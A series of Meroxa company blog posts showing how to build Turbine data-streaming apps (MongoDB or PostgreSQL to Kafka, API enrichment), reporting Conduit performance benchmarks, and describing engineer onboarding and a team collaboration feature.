$ meroxa app list

ID              NAME           LANGUAGE     STATE
====== ======================= ============ ==========
584           liveapp          javascript   running
2980           fooapp          golang       degraded
3095           barapp          python       running

✨ To visualize your applications, visit https://dashboard.meroxa.io/apps

Have questions or feedback?

We love hearing from our customers! If you have questions or feedback, please feel free to contact us directly at support@meroxa.com or by joining our Discord community server.

🚀 We can’t wait to see what you build!

Streaming changes in real-time from MongoDB to Apache Kafka

Tanveet Gill — Tue, 06 Dec 2022 21:35:10 GMT

It’s easy to see the appeal of MongoDB, so it’s no surprise it's so popular. With the advent of numerous managed providers, the operational burden has also been minimized.

One problem that has not really been solved that well, is the ability to pull data out of MongoDB efficiently and in real-time. In our example, we will be moving data from MongoDB to Kafka in real-time.

This post walks through building a Turbine Data Stream Processing App to do just that.

How it works

The Turbine Data Stream Processing App works by creating a CDC (Change Data Capture) connector from the platform to a MongoDB Atlas-hosted database. This connector receives changes in real-time and publishes them into the Meroxa Platform in the form of a stream.

The Turbine library allows us to write functions to transform and manipulate that data easily. In fact, we can do anything we normally do with a general programming language, such as calling APIs or importing packages and libraries.

The Turbine framework does the heavy lifting to make that stream of data available to your custom function in a way that’s familiar and easy to reason about.

In this example, we’re simply filtering out some of the data and pass through the rest to the downstream Kafka cluster.

Requirements

Setup

We’ll be using MongoDB Atlas and Confluent Cloud in this example. Both services provide free trials and/or free plans making it easy for you to create accounts and follow along if you don’t already have one.

Once you’ve created a MongoDB Atlas account, you can create a free shared cluster. This will be enough for the purposes of testing out this application.

💡 Refer to the MongoDB Atlas documentation here to set up a free shared cluster.

Similarly, you can use the *basic *****Kafka plan on Confluent Cloud.

💡 Refer to Meroxa’s guide here to set up a Confluent Cloud account

Next, we’ll initialize the Data Stream Processing App via the Meroxa CLI. If you need to create an account on Meroxa, you can request a demo. Once you have created a Meroxa account and set up the Meroxa CLI you need to add your resources and initialize a Turbine Data Stream Processing App.

First, we will add the resources. Below, we are using the Meroxa CLI to add our MongoDB Atlas instance and Confluent Cloud instance. Alternatively, you can also do this via the Meroxa Dashboard.

$ meroxa resource create mdb \\
  --type mongodb \\
  --url "mongodb://$MONGO_USER:$MONGO_PASS@$MONGO_URL:$MONGO_PORT"

$ meroxa resource create cck \\
  --type confluentcloud \\
  --url "kafka+sasl+ssl://$API_KEY:$API_SECRET@$BOOTSTRAP_SERVER?sasl_mechanism=plain" \\

Then, we create a new Turbine App project (in Go) in the directory marketplace-notifier.

$ meroxa apps init --lang go marketplace-notifier

💡 If you prefer to use another language, Meroxa also supports Javascript, Python, and Ruby with support for many more languages coming!

Now we’re all set to start implementing our Data Stream Processing App.

Data Stream Processing App

All Turbine Data Stream Processing Apps consist of two main parts. The pipeline topology part (where we define the components that make up the data pipeline, including Resources, Sources, Destinations, Processors etc…) and the function part (where we can implement any custom logic that’s needed).

func (a App) Run(v turbine.Turbine) error {
  // reference the MongoDB resource that was created on the platform. In this case I created "mdb".
  source, err := v.Resources("mdb")
  if err != nil {
    return err
  }

  // pull records from the "events" collection.
  rr, err := source.Records("events", nil)
  if err != nil {
  	return err
  }

  // apply the "FilterInteresting" processor to those records.
  res := v.Process(rr, FilterNotify{})

  // reference the Kafka resource that was created on the platform. In this case I created "cck".
  dest, err := v.Resources("cck")
  if err != nil {
  	return err
  }

  // write out the resulting records into the collection (or __Topic__ in the case of Kafka). In this case I'm writing
  // out to the Topic "interesting_events".
  err = dest.WriteWithConfig(res, "notifications", nil)
  if err != nil {
  	return err
  }

  return nil
}

Here’s the entirety of the Run method. Here we can see that we’re grabbing references to the MongoDB resource mdb we created above, pulling records out of it from the collection events, piping those records through a processor FilterNotify and then ultimately writing it out into the topic notifications on the Kafka resource cck (also created above).

Processing Data

The actual business logic of our Turbine Application is relatively straightforward. We loop through the slice of records and if a particular event includes a “vip:true” then we call out to an external service to notify the appropriate user.

// FilterInteresting looks for "interesting" events and filters out everything else.
// For this example, __interesting__ events are any events where an event is associated with a VIP user.
type FilterInteresting struct{}

func (f FilterInteresting) Process(stream []turbine.Record) []turbine.Record {
	var interestingEvents []Event
	for _, r := range stream {
		ev, err := parseEventRecord(r)
		if err != nil {
			log.Printf("error: %s", err.Error())
			break
		}

		if isInteresting(ev) {
			interestingEvents = append(interestingEvents, ev)
		}
	}

	if len(interestingEvents) > 0 {
		recs, err := encodeEvents(interestingEvents)
		if err != nil {
			log.Printf("error: %s", err.Error())
		}
		return recs
	}
	return []turbine.Record{}
}

// Event represents the Event document stored in MongoDB.
type Event struct {
	UserID    string    `json:"user_id"`
	Activity  string    `json:"activity"`
	VIP       bool      `json:"vip"`
	CreatedAt time.Time `json:"created_at"`
	UpdatedAt time.Time `json:"updated_at"`
	DeletedAt time.Time `json:"deleted_at"`
}

Demo

Meroxa allows developers to test their code locally via fixtures. Fixtures are a JSON representation of the data that the Turbine library will process. In our example, we have a single record to represent what the Data Stream Processing App will read from MongoDB and write to Kafka if the FilterInteresting function returns an “interesting” event. To run locally, you can run the following command:

$ meroxa apps run

We will get the following output:

Here we can see that 1 record was written to the cck resource, which matched our criteria in our code. Once you are happy with your code we can deploy the app live to read and write with your actual resources. To deploy your app live you can run the following commands:

$ git add .

$ git commit -m "Initial Commit"

$ meroxa apps deploy

💡 For more information on deployment, you can refer to the Meroxa Docs here.

Once your app is deployed, you will see that every record in your MongoDB has been processed and has been written to your Kafka topic. As records come into your data source (MongoDb in this example), your Turbine app running on the Meroxa platform will process each record in real-time.

Meroxa sets up all the connections and removes the complexities, so you, the developer, can focus on the important stuff.

Next Steps

Now that the Turbine Data Stream Processing App has been deployed we can extend the app with additional Destinations. This allows us to also persist the end results into an audit table or data warehouse for additional tracking and analysis.

To add additional Destinations you would simply create the resource, reference it (e.g. app.resource("auditdb")) and then write to that as well.

💡 You can add additional destinations just like we added MongoDB and Confluent Cloud above using meroxa resource create . See Resources here.

We could also easily extend the processing logic by adding whatever functionality is required into our custom function. This could be as straightforward as reformatting fields or as sophisticated as importing 3rd party packages and leveraging those to transform the records or hitting external APIs to enrich the data.

💡 For an example on using API’s in Turbine you can read our blog post on APIs here.

Have questions or feedback?

If you have questions or feedback, reach out directly by joining our community or by writing to support@meroxa.com.

Happy Coding 🚀

Meroxa Now Streaming on Ruby

Jennifer Hudiono — Thu, 01 Dec 2022 21:12:00 GMT

Preview Turbine Ruby

We were thrilled to sponsor and attend RubyConf 2022 in Houston this week. Our team had an amazing time connecting with and learning from the ruby community, which is why we’re excited to introduce Turbine to Rubyists everywhere. The Turbine application framework was designed for software developers using their preferred programming language to build, test, and deploy data streaming applications. As the world continues to move towards real-time, there’s a growing demand for building sophisticated stream processing applications. Where traditionally this would require separate task specific tooling, new and unfamiliar paradigms, and managing complex services, the Turbine framework streamlines this experience for software developers. Combining Ruby’s simplicity and power with Turbine, Rubyists can now build data streaming apps with development workflows you know and love.

TuRBine Applications

The Turbine Ruby developer preview will grant you early access to Turbine.rb which is currently in the final stages of feature development. With Turbine.rb developer preview, you can build and deploy a real-time stream processing application using Ruby. The preview will also give you a chance to shape the final stages of feature development with feedback, get pre-release support, and have your application ready prior to launch day.

Refer to our documentation on how to build and deploy a Turbine app using Ruby.

Sign Up for the Developer Preview

Turbine Ruby is currently in developer preview with limited functionality. If you wish to participate, sign up here and a member of our team will follow up to discuss the steps to get the feature enabled. We love hearing from our users! If you have questions or feedback, please feel free to contact us directly via support@meroxa.com or by joining ourDiscord community server.

🚀 We can’t wait to see what you build!

Using Turbine to call multiple APIs in real-time to transform & enrich data

Tanveet Gill — Fri, 18 Nov 2022 14:19:31 GMT

Data enrichment and transformations are essential to making the most of your data. Today, we will look at how Meroxa enables developers of any level to enrich and transform their data using a code-first approach. Typically, other real-time transformation vendors limit the type of data manipulation you can do. They typically take a UI approach which limits you to only doing things that the provider has programmed in. With Meroxa’s real-time streaming capabilities and Turbine’s code-first approach, developers have the power to program their data apps any way they want, using languages they are already familiar with.

Here are a few examples of what you can do with Turbine in real-time:

You could use a hashing library like string-hash to hash sensitive customer data. If you want to encrypt certain data you could use crypto-js to encrypt sensitive data and store the decryption codes in another data store while keeping it relational.
If you have data that needs to be validated you could write a custom validation function to be run on each record. For example, Phone Number formats in your database could be matched to pass a validation check. Furthermore, you could use a 3rd party API such as Twilio or Telynx to enrich each phone number in your database.
You can use any API to enrich your data. We’ve seen developers use the Google Maps API to enrich address data to validate and format an address that is easily sharable amongst services.

Overview

In today's example, we are going to be focusing on how easy Turbine makes it for developers to call multiple APIs to enrich sales data. This application will take a company name (ex: Apple) from PostgreSQL (really, it can be from any data source) and run each record through a series of API calls. Within Turbine, we will be calling the Clearbit API to get the domain name for the company (ex: Apple → Apple.com), then get contact information on employees at the company using Apollo’s Search API (ex: Getting Apple’s CEO, CIO, CFO), and finally, we will create a HubSpot contact for those employees. Later, we will add those Hubspot contacts to a list and dump the data into Snowflake for further analysis and also write it to a Confluent Cloud-managed Kafka cluster for real-time use cases such as personalized outreach. Here is a visual on how this will work:

The Code

We will use the Javascript Turbine framework to get records with company names from PostgreSQL, run each record through a series of API calls, and write them to Snowflake and Kafka.

💡 If you prefer to use another language, Meroxa also supports Go, Python, and Ruby with many more languages coming!

Requirements

Setup

Once you have created a Meroxa account and set up the Meroxa CLI you can follow the following steps to get up and running:

💡 Here we are creating the resources via the CLI. You can also do so via the Meroxa Dashboard once you are logged in.

Adding your PostgreSQL and SnowflakeDB resources

PostgreSQL (Guide on configuring your Postgres) - Source Resource

Below we are creating a PostgreSQL connection to Meroxa named leadsapp_pg.

Note: To support CDC (Change Data Capture) we turn on the logical_replication flag.
```
$ meroxa resource create leadsapp_pg \\\\
  --type postgres \\\\
  --url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \\\\
  --metadata '{"logical_replication":"true"}'
```
Snowflake (Guide on setting up Snowflake) - Destination Resource

Below, we are creating a Snowflake DB connection named snowflake.
```
$ meroxa resource create snowflake --type snowflakedb --url "snowflake://$SNOWFLAKE_URL/meroxa_db/stream_data" --username meroxa_user --password $SNOWFLAKE_PRIVATE_KEY  
```
Apache Kafka (Guide on setting up Confluent Cloud/Kafka) - Destination Resource

Here we are creating a Kafka connection named apachekafka.
```
$ meroxa resource create apachekafka \\
  --type kafka \\
  --url "kafka+sasl+ssl://<USERNAME>:<PASSWORD>@<BOOTSTRAP_SERVER>?sasl_mechanism=plain" \\
```
💡 Meroxa Data apps do not necessarily need destination resources. If you would just like to read data from a source like PostgreSQL and call APIs you can skip the above.
Initializing Turbine in Javascript
```
$ meroxa apps init leadsapp --lang js  
```

Coding our Resources

Open up your leadsapp folder in your preferred IDE. You will get boilerplate code that explains where to code your sources and destinations named in Step 1. In our case we just need to do the following:

exports.App = class App {
  async run(turbine) {
    // First, identify your PostgreSQL source name as configured in Step 1
    // In our case we named it pg_db
    let source = await turbine.resources("leadsapp_pg");

    // Second, specify the table you want to access in your PostgreSQL DB
    let records = await source.records("leads");

    // Third, Process each record that comes in! ProcessData is our function that will call the APIs (See more below)
    let processed = await turbine.process(records, this.processData);

    // Fourth, identify your Snowflake DB & Kafka source name configured in Step 1
    let destinationSnowflake = await turbine.resources("snowflake");
    let destinationKafka = await turbine.resources("apachekafka");

    // Finally, specify which table or topic to write that data to
    await destinationSnowflake.write(processed, "leads_from_pg");
    await destinationKafka.write(processed, "leads_from_pg_topic");
  }
};

Coding our APIs

await turbine.process allows us to write a function that runs on each record. Here we can call our Clearbit, Apollo & HubSpot APIs in real-time.

💡 This code can be found the apps Github repo here. The functions used to make the API calls are in the Github repo here: getDomainNameFromClearbit getContactsFromApollo _generateContactDataForHubspot createHubspotContact addHubspotContactToList

async processData(records) {
  // Loop through each Postgres record
  records.forEach(async (record) => {
    // Extract the company name from the Postgres row (Ex: Apple)
    const companyName = record.get("company_name")
    console.log(`[processData] companyName:`, companyName)

    if (!companyName || companyName.length === 0) {
      console.log(`[processData] [WARN] Could not get companyName from record. companyName: ${companyName}`)
      record.set("people", [`Could not get companyName from record. companyName: ${companyName}`])
      return
    }

    // Get the company's Domain Name (Ex: Apple -> Apple.com)
    const domainName = await getDomainNameFromClearbit(companyName)
    console.log(`[processData] domainName via:`, domainName)

    if (!domainName || domainName.length === 0) {
      console.log(`[processData] [WARN] Could not get domainName via getDomainNameFromClearbit. domainName: ${domainName}`)
      record.set("people", [`Could not get domainName via getDomainNameFromClearbit. domainName: ${domainName}`])
      return
    }

    // Call Apollo search API to get contact information on the CTO and VP of Engineering roles
    const contacts = await getContactsFromApollo(domainName, ["VP of Engineering", "CTO"])

    if (!contacts || contacts.length === 0) {
      console.log(`[processData] [WARN] Could not get contacts via getContactsFromApollo. contacts: ${contacts}`)
      record.set("people", [`Could not get contacts via getContactsFromApollo. contacts: ${contacts}`])
      return
    }

    contacts.forEach(async (contact) => {
      // Generate a Contact object using data from Apollo
      const contactData = _generateContactDataForHubspot(contact)
      console.log(`[processData] contactData for createHubspotContact:`, contactData)

      // Add a new contact column to the Postgres record, which we will write to Snowflake
      record.set("contact", [contactData])

      // Create a HubSpot Contact
      const contactId = await createHubspotContact(contactData)
      console.log(`[processData] contactId for addHubspotContactToList:`, contactId)

      if (!contactId || contactId.length === 0) {
        console.log(`[processData] [WARN] Could not get contactId via createHubspotContact. contactId:`, contactId)
        return
      }

      // Add each contact we created to a specific HubSpot list
      await addHubspotContactToList(contactId, 381)
    })
  })

  // Return the modified Postgres records to write to Snowflake
  return records;
}

Deploying Your App

Commit your changes

$ git add .
$ git commit -m "Initial Commit"

Deploy your app

$ meroxa apps deploy

Once your app is deployed, you will see that your HubSpot account has all the contacts for companies in your PostgreSQL DB table, and they will be added to the list you specify in the addHubspotContactToList function. If you opted into moving your data into Snowflake, you will see the enriched data populate in the leads_from_pg table and in your leads_from_pg_topic for Kafka. As records come into your data source (PostgreSQL in this example), your Turbine app running on the Meroxa platform will process each record.

Meroxa will set up all the connections and remove the complexities, so you, the developer, can focus on the important stuff.

Have questions or feedback?

If you have questions or feedback, reach out directly by joining our community or by writing to support@meroxa.com.

Happy Coding 🚀

Real-Time Data Streaming from PostgreSQL to Apache Kafka in 4 Lines of Code w/ CDC

Tanveet Gill — Tue, 08 Nov 2022 21:36:35 GMT

Writing data into Apache Kafka can become a tedious task for any data developer. If you’ve ever had a situation where your applications insert data in real-time to your database and you want to take actions on that data by moving it into a Kafka Topic, then Meroxa can help you do that in a few lines of code.

Overview

Here we will show an example of multiple applications inserting data into a PostgreSQL database, where we then use Meroxa to stream that data over to a Kafka Topic instantly as records get inserted.

Below we can see how data flows from your Applications to PostgreSql and then where Meroxa comes in to stream it in real-time to your Kafka Topic

Take Me To The Code!

In this example, we will use the Javascript Turbine framework to get records from PostgreSQL and write them to your Kafka Topic.

💡 If you prefer to use another language, Meroxa supports Go, Python, and Ruby as well with many more coming!

Requirements

Once you have signed up for Meroxa and set up the Meroxa CLI you can follow the following steps to get up and running:

💡 Here we are creating the resources via the CLI, you can also do so via the Meroxa Dashboard once you are logged in.

Adding your PostgreSQL and Kafka Topic Resources

PostgreSQL (Guide on configuring your Postgres) - Source Resource

Below we are creating a PostgreSQL connection to Meroxa named pg_db.

Note: To support CDC (Change Data Capture) we turn on the logical_replication flag.
```
$ meroxa resource create pg_db \\\\
  --type postgres \\\\
  --url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \\\\
  --metadata '{"logical_replication":"true"}'
```
Kafka (Guide on setting up Confluent Cloud/Kafka) - Destination Resource

Below we are creating a Kafka connection named apachekafka.
```
$ meroxa resource create apachekafka \\    --type kafka \\    --url "kafka+sasl+ssl://<USERNAME>:<PASSWORD>@<BOOTSTRAP_SERVER>?sasl_mechanism=plain" \\  
```

Initializing Turbine

$ meroxa apps init meroxa-kafka --lang js

Writing The 4 Lines Of Code

Open up your meroxa-kafka folder in your preferred IDE. You will get boilerplate code that explains where to code your sources and destinations named in Step 1. In our case we just need to do the following:

exports.App = class App {
  async run(turbine) {
    // First, identify your PostgreSQL source name as configured in Step 1
    // In our case we named it pg_db
    let source = await turbine.resources("pg_db");

    // Second, specify the table you want to access in your PostgreSQL DB
    let records = await source.records("customer_data_table");

    // Optional, Process each record that comes in!
    // let transformed = await turbine.process(records, this.transform);

    // Third, identify your Kafka/Confluent source name configured in Step 1
    let destination = await turbine.resources("apachekafka");

    // Finally, specify which Topic to write that data to
    await destination.write(records, "customer_data_topic");
  }
};

💡 await turbine.process allows developers to write a function that will be run on each record. If you need to pre-process your data before sending it to your Kafka topic you can write your code here.

Deploying Your App

Commit your changes

$ git add .  $ git commit -m "Initial Commit"

Deploy your app

$ meroxa apps deploy

Once your app is deployed you will see your Kafka Topic populate all the data from the PostgreSQL table. You can also insert a record to your table to see it stream over live in Confluent Cloud!

Meroxa will set up all the connections and remove the complexities, so you the developer can focus on the important stuff.

Have questions or feedback?

If you have questions or feedback, reach out directly by joining our community or by writing to support@meroxa.com.

Happy Coding 🚀

Testing the Limits: Performance Benchmarks for Conduit

Haris Osmanagić — Thu, 03 Nov 2022 12:46:30 GMT

Introduction

Conduit is meant as a Kafka Connect replacement with better developer experience but it’s just as easy to use it to build real-time data pipelines. For that reason, we didn’t want to wait for too long to know how much Conduit can handle, or what it takes to break Conduit. To answer the two questions, we developed a benchmarking tool. In this blog post, we’ll share our experience building it and using it.

Types of performance testing

There are different types of performance testing, and in Conduit we started with the following three:

Load testing (i.e. testing Conduit with expected load)
Stress testing (i.e. testing Conduit with unusually high load)
Spike testing (i.e. testing Conduit with suddenly increasing or decreasing loads)

We do not plan to stop here, and we plan to expand our tests to include other types of performance testing (especially soak and capacity testing).

Principles

Firstly, let’s mention the principles upon which we built this version of benchmarks:

It should be possible to track performance of Conduit itself (i.e. without connectors included)

One thing we’re especially interested in is the performance of Conduit itself. Let’s remember what a pipeline looks like:

Connectors are pluggable components which can greatly affect the performance of a pipeline. For that reason, we decided to have a number of tests which will cancel out the effects of connectors. We achieved this using two special types of connectors:

A generator source, for which generating a record comes at virtually no cost, but can be configured to send data at a specified rate (or rates, to simulate spikes).
A NoOp destination which simply drops all records without doing anything.

It should be possible to track performance of Conduit with the connectors included

While zooming in on Conduit’s performance is definitely helpful, we do not want the performance testing framework to restrict us into that, and not make it possible to test Conduit with connectors. This would be helpful for a number of reasons:

To know what, and what not to expect from a production environment
To try reproducing behavior from a production environment
To conduct a performance test on a connector you developed (e.g. you may have developed a source connector, so you can test it using the NoOp destination connector)

Benchmarks are run on-demand (automated benchmarks are planned for later)

As a first step, it’s acceptable if the performance tests are run manually. Automated tests are a great tool to compare the performance of two releases, or making sure that code changes didn’t introduce degradations. However, before answering the question “was this a good change from a previous state?”, we need to establish a baseline*.* Automated benchmarks are on our roadmap, and with that we hope to be able to answer both questions.

It's easy to manage workloads

Workloads are one of the most important parts in a performance test, and so we’d like to be able to easily add them. In Conduit’s case, there are two significant parts of a workload:

Conduit’s own configuration
Pipeline setup

Ideally, both configurations can exist in files. At the time of developing the benchmarking framework, the pipeline file configurations were in progress, so the way workloads are specified is via Bash scripts, which create pipelines using the HTTP API. Here you can find an example of a workload, which simulates bursts, i.e. conducts spike testing.

The connector configuration (which is what is used to generate load) can be clearly seen in the scripts. Still, the scripts are relatively verbose and we plan to replace them with pipeline configuration files.

Metrics of interest

When we set out to write the benchmarking framework, one of the first questions we answered was “what are we actually interested in?”. Generally speaking, in performance tests we want to know how fast the work was performed, but also what resources have been used.

As for the “work performed” part, we chose to monitor the number of records per second and the number of bytes per second, as they are the most important indicators of a pipeline’s performance. If you have metrics related to individual objects/events (for example, we track the time Conduit spends on a record), it’s also useful to show percentiles.

With regards to resource usage, we’re generally interested in CPU and memory usage. Conduit itself doesn’t use disk or network heavily, so we’re not keeping a close eye on those.

Data collection

Regardless of what metrics you define, all the data collected needs to be linked to the actual test it belongs to. This can be the test name, a timestamp, version of the system you’re testing, or version of the test framework, etc.

Conduit comes with a number of already defined metrics. The metrics available are exposed through the HTTP API and ready to be scraped by Prometheus. You can find more information about the metrics here.

With that, using a tool like Grafana to monitor Conduit makes a lot of sense. While we do monitor Conduit through Grafana too, it’s not how we primarily do it. Eventually, we’d like to be able to compare metrics from different test runs (e.g. to check if there were performance degradations between two releases). Comparing the results using Prometheus or Grafana cannot be done easily, so we wrote a simple tool which will collect Conduit-specific metrics and save them to a CSV file.

When it comes to collecting data about resource usage, we are doing it in two ways. The first is instrumenting Conduit by using the Prometheus client library, which gives us a lot of information about the internals (e.g. memory allocation, heap statistics, number of goroutines, etc.). The second is by using DataDog, which we use for the general VM stats (mostly for CPU and memory related metrics).

Here’s a tip if you’re visualizing your data: implement a break between test runs. Otherwise, once test N is done, and test N+1 starts immediately after it, you might only see a fall or an increase on your graph. That can make it more difficult to correlate the test results and your graphs.

Target instance

We recommend running Conduit on an instance with 2 CPUs and 4 GB of RAM, so we’re running the tests against VMs with the same specifications.

The test framework we developed can run the tests either against Conduit in Docker containers or against Conduit installed on an AWS EC2 instance (sidenote: we have a great guide for launching an AWS EC2 instance and installing Conduit from scratch!).

When it comes to testing on EC2 instances, here’s a couple of things we’d like to share with you:

Don’t forget about them! Especially if you’re not using them very often. Otherwise, your next AWS bill may be a big surprise.
Be well informed about throttling on the instance you’re using. Certain types of instances will be throttled once you run out of credits, which may affect the test results.

Data evaluation

The first step here is to actually question the data. This is especially important in cases where you’ve written some code yourself to expose certain metrics or to collect them. For example:

Have you calculated a metric correctly?
Are the units correct and expected (nanoseconds vs milliseconds, megabytes vs mebibytes, etc.)?
Are you able to cross check the metrics? (e.g. if a pipeline rate is shown as 100 records per second, do you actually see 6000 records in a destination after 60 seconds?)
Are time zones matching? (e.g. when checking resource usage, make sure you see the same time zones in your resource graphs and your test results)

Once you are confident in your test results, you can actually start evaluating the data. Here are a few questions which may help:

Is the data in a test result consistent? If not, why not? For example, in some test results we saw that Conduit spent 100ms on a record (figures are for illustrative purposes), so you may expect a throughput of 10 records per second. However, the throughput was actually much higher. We then recalled there was some concurrent processing involved, which explained the numbers.
What’s the relationship between a workload and the resource usage? Are you seeing the expected increase in resource usage when you increase the workload in a specific way? For example, in our tests with large records, we do expect the memory to go up. Or, if you have spike tests, does the resource usage go back to normal once a burst is done?
Is there a relationship between different workloads?

Results and observations

Large messages (4MB payloads)

By default, gRPC messages are limited to 4 MB in size. We also think that messages in data streams are much smaller than that in the majority of cases, so this feels like a good test. We have two variations of this test: one with a rate of 100 msg/s and one with a rate of 1000 msg/s.

At a rate of 1000 msg/s, the throughput is around 200/s. We did expect a smaller rate, but this is something we’re going to look into and try improving.

Small messages, high rates

We ran a few tests with message payloads which are 1 KB in size. The rates were: 10k msg/s, 15k msg/s, 20k msg/s.


Generator rate	Pipeline rate	CPU (%)	Memory usage (GB)
10 000	6 650	46	1.4
15 000	10 550	55	1.55-1.7
20 000	13 270	62	1.55-1.7
“Insane”(the generator sends records as quickly as possible)	29 000	77	1-1.4 GB

As we see, the actual throughput is roughly 70% of the configured generator rate. We have an issue open to investigate this difference. We hypothesize that, at higher rates, the ratio between the time the generator sleeps and the time it takes to return and acknowledge a record becomes more significant. In other words, it’s possible that, at a higher rate, the generator produces less records than specified.

Bonus workload: We have a workload, where the messages are generated as quickly as possible by the generator.

Small message bursts

In this workload, we have a generator producing 10 msg/s, and then we have 30-second bursts, which happen every 30 seconds, and where we have 1000 msg/s.

The CPU usage was oscillating between 0 and 10%, where the time between peaks was exactly 60 seconds, which corresponds to the configured burst time.

Improvement loops

Last but not least, let the tests “soak” a little bit. Running them periodically or even frequently will let you know how to make them more efficient, easier to run, and what additional metrics you may need or not. Another way to improve your benchmark is by open-sourcing it, letting others use it and suggest improvements. Here’s us doing that here. Looking forward to your questions, comments and suggestions!

Welcome to Meroxa: Your First Month at Meroxa as an Engineer

Diana Doherty — Thu, 03 Nov 2022 12:45:07 GMT

On your first day at a company, you’re welcomed into a new team with new people, new culture, new technologies, and new code. Getting familiar with the novelty can be overwhelming. If this new job is also remote, you’ll be faced with additional challenges. Where those lunches and runs for coffee in the office presented opportunities to get to know your coworkers, these opportunities aren’t available; they need to be created.

It’s important for companies to set up their new employees for long-term success. By creating a place of psychological safety, and acclimating them into company culture, new employees can prosper and feel fulfilled in their new role.

At Meroxa, we onboard engineers by presenting them with a clear plan, the freedom to complete each task in their preferred timezone and working hours, and establishing a strong focus on pairing.

Let’s dive deeper into what your onboarding experience could look like at Meroxa.

Before Day 1

Your onboarding process starts before your first day.

Before you start, we’ll ask you to complete a questionnaire. We want to know your laptop preferences, logistical details, and more about you!

Once we receive your response, we’ll:

Assign you an onboarding buddy.
Create accounts and send out invites for necessary engineering and operations tooling.
Provide you access to your company email, including calendar invites for the people you’ll meet on your first day!
Ship you a personalized care package. We always try to find a mix of things with a personal touch and a few new things to explore! Everyone gets a set of common presents (it’ll be a surprise!), but I also got a tiramisu (my favorite dessert!) from a local bakery and an at-home ceramics kit!
Send out a laptop from your selection of Macbooks to Linux machines.

By tackling these tasks ahead of time, we ensure that you’re not left alone, or lost during your first day.

Day 1

On your first day, the operations team will welcome you with a personalized scrum board full of your onboarding tasks for the month. They’ll walk through your onboarding document (found in the scrum board) that will familiarize you with external services (both operations and engineering related), instruct you on how to download engineering tools, and guide you through the setup of our end-to-end dev environment locally.

Next, you’ll meet your onboarding buddy! For the smoothest experience, we try to ensure your buddy:

Lives in a timezone at, or close to yours
Is part of your new team, or is knowledgeable in your new domain of work
Can create a safe and comfortable space for you to ask for help or ask any questions that may arise

Your onboarding buddy is a guide and your primary point of contact as you come up to speed on all things Meroxa.

As people start their work days, the #general slack channel comes alive with different pings from your new coworkers welcoming you to the team. This will be the perfect opportunity to greet them, and join the myriad hobby slack channels: #cutebeasts, #art, #games, #women_at_meroxa, #home-improvement, #food, and plenty more!

Week 1

During your first week, you and your manager will set up the cadence and structure of your 1-on-1s. Your first couple of sessions are the perfect time to discuss and document your goals for the first 30/60/90 days, and align your yearly goals to Meroxa’s company values.

Daily check-ins with your onboarding buddy are a time to get insights on the structure of specific repositories, more info on the engineering lifecycle, and help setting up your tools and permissions if you need them.

The product team will give you a tour of our product offerings, and you’ll be meeting with other engineers for the architectural overview.

By the end of the week, you should have a clearer understanding of how everything works together, and will hopefully be ready to build your first Turbine application! Turbine is a data application framework for building server-side applications that are event-driven, respond to data in real-time, and scale using cloud-native best practices. To get started with Turbine, check out our getting started guide!

Month 1

Most of our backend components are written in Go, and our front end is JavaScript and Ember. If you are unfamiliar with any of the languages you’ll be working with this is your time to learn! The yearly educational fund should supply the right books and courses to suit your needs. We have slack channels for a variety of topics other people are learning, and you’re encouraged to join the discussion! Joining those channels provides you with a good opportunity to connect with other learners about the same topic, and a curated list of resources people previously used in their learning journey.

Soon enough, you’ll be ready for your first ticket. Your onboarding buddy will encourage you to pair with them on this task. Once the ticket is complete, you will receive a detailed and prompt Pull Request review. Pull Requests are a great opportunity to further your knowledge about our components and best practices. Take the time to learn by observing and reviewing other PRs as well. Know that a PR’s intention should be clear, even when someone new is looking in, so if you don’t understand something, ask as a comment in the PR! If you need more help, ask your onboarding buddy to be there to review PRs with you.

One of your tasks for the month is to pair at least five times with different team members. As intimidating as that might seem, it’s intended to give you a friendly introduction to our components, introduce you to more people on the team, and get accustomed to pairing when you are stuck.

Another onboarding task will be to schedule 1-on-1s with people across the organization. This is a time to connect on mutual interests, and better understand their work domain.

Feedback

Our onboarding process is never complete; it is an iterative process that should always be made better for the next person. If you experience setbacks or tension at any point during onboarding, make a ticket outlining your desired changes, and if you’re up for it, tackle it!

If you’re interested in Meroxa and would like to experience our onboarding process firsthand, check out our openings! Can’t wait to have our first pairing session! :)

Introducing Collaboration for the Meroxa Platform

Jennifer Hudiono — Tue, 01 Nov 2022 18:09:36 GMT

As we navigate working in remote, hybrid, or in-office environments, collaboration continues to play an important role for teams. Collaboration enables teams to share knowledge so they can work more efficiently and effectively. Today we introduce the first step towards making Meroxa a collaborativereal-time code-first stream processing application platform for developers.

Data applications offer developers a powerful solution to work with event-driven and streaming architectures. A lone developer does not have to be encumbered by the complexity of this challenge. With Meroxa’s newest feature, developers can now easily invite their teammates to their account to share resources and build data applications together. We’re excited to take this step and see what we can build together!

“Alone we can do so little; together we can do so much." – Helen Keller

Inviting Users

To start collaborating with your teammates, sign into your Meroxa account and click on your profile icon and go to Settings. Under the Account tab, you can rename your account from the default account name given to help better identify the shared account with your teammates.

After setting the account name, go to the Users tab to start inviting users to your account.

The Users tab is where you can easily manage all the users in the account. When a user is added, they will receive an invite email that will ask them to accept the invite to join your workflow. Each member of the team must have their own dedicated account, therefore new users to Meroxa will be directed to create an account before they can officially accept the collaboration invite. If a user already has an existing Meroxa account, they will have the option to sign-in.

Setting Accounts

Multiple Accounts

If you have multiple accounts with Meroxa, you will be able to navigate and switch between your accounts in the dashboard and in the CLI.

Note: Resources and applications belong to a specific account. They cannot be shared between accounts, so ensure you have the right account selected when creating any resources or applications.

In the dashboard, you can click on your profile icon to switch between your accounts.

In the CLI, you can run the following command to view and set your account.

Working Together

Once a user has accepted an invite to join a collaboration workspace, they can begin collaborating in the account. At this time, all users in the account will have the same level of access across resources, applications, and settings.

Resources

Check out our Resources Guide to learn more about available source and destination resources and how to use them in Turbine applications. You can add resources via the dashboard or the CLI. All users in the account will be able to add, edit, access, and remove resources available in the account.

Applications

Check out our Getting Started with Turbine Guide to learn more about how to initialize, develop, deploy, and release a data application using our application framework. You can initialize and deploy applications via the CLI. Meroxa scaffolds a codebase in an empty Git repository when you initialize a Turbine application where you can develop your application. However, we encourage teams to collaborate on their application code in a shared Github repository accessible to your team. Through the shared repository you can track, commit, clone code accessible to your team and deploy an application in Meroxa using our CLI within minutes.

Once an application is deployed, everyone in the account will be able to view and manage that application. All users in the account can add applications, view applications deployed in the account and remove existing applications.

Settings

